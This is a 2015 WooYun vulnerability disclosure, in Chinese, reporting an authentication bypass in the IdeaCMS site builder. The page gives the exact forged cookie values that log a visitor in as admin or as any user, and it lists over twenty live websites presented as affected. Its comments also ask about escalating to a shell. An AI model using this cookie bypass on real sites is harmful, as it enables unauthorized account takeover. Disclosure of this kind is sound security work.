当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107600

漏洞标题:IdeaCMS建站系统通用漏洞 影响上万网站

相关厂商:IdeaCMS

漏洞作者: Ch丶0nly

提交时间:2015-04-16 11:20

修复时间:2015-05-31 11:22

公开时间:2015-05-31 11:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某CMS建站系统通用漏洞 影响上万网站

详细说明:

IdeaCMS基于ASP+MSSQL/ACCESS的技术开发,自2008年发布第一个版本以来,我们每年都对程序做一次比较大的版本更新,至今已经发布了六个大版本。
IdeaCMS以简单、高效、灵活、易用、开源、模板新颖几大特点备受广大用户的青睐。通过admin5,chinaz等第三方平台下载量累计已经超过50万。部署网站超过100万。
官网:http://www.ideacms.net
百度关键字:Powered By IdeaCMS
该CMS系统前台用户登陆存在逻辑漏洞,可登陆任意用户(不存在的也可以) 神奇吧
官网演示:http://www.ideacms.net/demo6/plug/user/login.asp
来到登陆页面
添加Cookie:urole=%2D1; User=admin; RoleID=0;
即可登陆admin用户

1.jpg


成功登陆

1.jpg


也可以登录不存在的用户

1.jpg


登陆wooyunsec用户(该用户数据库中不存在,仍然可以继续登陆)

1.jpg


漏洞证明:

附部分案例:
www.kflame.com
www.jtxdcn.com
www.twcss.com
www.bjxxsy.com
lyopto.cn
www.xyc86.net
www.schgw.cn/
www.topijia.com
www.getop.cn
www.yataoo.com
www.ybbeier.com
www.mydjzx.com
www.5ceo.net/
www.xinxiaxin.com
www.xmghqg.com
www.xsyqcz.com
www.jianling-office.com
www.longhaicn.com
www.hfsms.com
www.shbotai.com
mingrenfeng.com
www.87238723.com
www.vrv3.com

修复方案:

修复

版权声明:转载请注明来源 Ch丶0nly@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论

  1. 2015-06-01 01:33 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    这个漏洞很好玩,但是登录以后能getshell么

  2. 2015-09-10 20:41 | 人丑嘴不甜 ( 路人 | Rank:28 漏洞数:8 | 小菜鸟 妄想成为大大的大牛)

    你试试不就知道了